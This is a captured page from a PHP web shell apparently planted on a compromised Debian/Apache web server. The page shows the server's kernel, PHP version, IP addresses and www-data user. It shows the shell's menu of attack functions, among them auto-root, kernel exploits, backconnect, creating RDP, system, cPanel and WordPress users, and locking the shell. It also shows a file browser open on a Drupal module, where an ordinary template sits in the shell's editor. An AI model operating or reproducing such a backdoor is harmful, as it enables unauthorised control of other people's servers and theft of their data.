Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.145.65.133
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
book /
[ HOME SHELL ]
Name
Size
Permission
Action
book-all-books-block.tpl.php
686
B
-rw-r--r--
book-export-html.tpl.php
1.86
KB
-rw-r--r--
book-navigation.tpl.php
2.04
KB
-rw-r--r--
book-node-export-html.tpl.php
686
B
-rw-r--r--
book-rtl.css
214
B
-rw-r--r--
book.admin.inc
9.38
KB
-rw-r--r--
book.css
1.01
KB
-rw-r--r--
book.info
355
B
-rw-r--r--
book.install
2.28
KB
-rw-r--r--
book.js
589
B
-rw-r--r--
book.module
46.82
KB
-rw-r--r--
book.pages.inc
7.18
KB
-rw-r--r--
book.test
15.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : book-export-html.tpl.php
<?php /** * @file * Default theme implementation for printed version of book outline. * * Available variables: * - $title: Top level node title. * - $head: Header tags. * - $language: Language code. e.g. "en" for english. * - $language_rtl: TRUE or FALSE depending on right to left language scripts. * - $base_url: URL to home page. * - $contents: Nodes within the current outline rendered through * book-node-export-html.tpl.php. * * @see template_preprocess_book_export_html() * * @ingroup themeable */ ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="<?php print $language->language; ?>" xml:lang="<?php print $language->language; ?>" dir="<?php print $dir; ?>"> <head> <title><?php print $title; ?></title> <?php print $head; ?> <base href="<?php print $base_url; ?>" /> <link type="text/css" rel="stylesheet" href="misc/print.css" /> <?php if ($language_rtl): ?> <link type="text/css" rel="stylesheet" href="misc/print-rtl.css" /> <?php endif; ?> </head> <body> <?php /** * The given node is /embedded to its absolute depth in a top level * section/. For example, a child node with depth 2 in the hierarchy is * contained in (otherwise empty) <div> elements corresponding to * depth 0 and depth 1. This is intended to support WYSIWYG output - e.g., * level 3 sections always look like level 3 sections, no matter their * depth relative to the node selected to be exported as printer-friendly * HTML. */ $div_close = ''; ?> <?php for ($i = 1; $i < $depth; $i++): ?> <div class="section-<?php print $i; ?>"> <?php $div_close .= '</div>'; ?> <?php endfor; ?> <?php print $contents; ?> <?php print $div_close; ?> </body> </html>
Close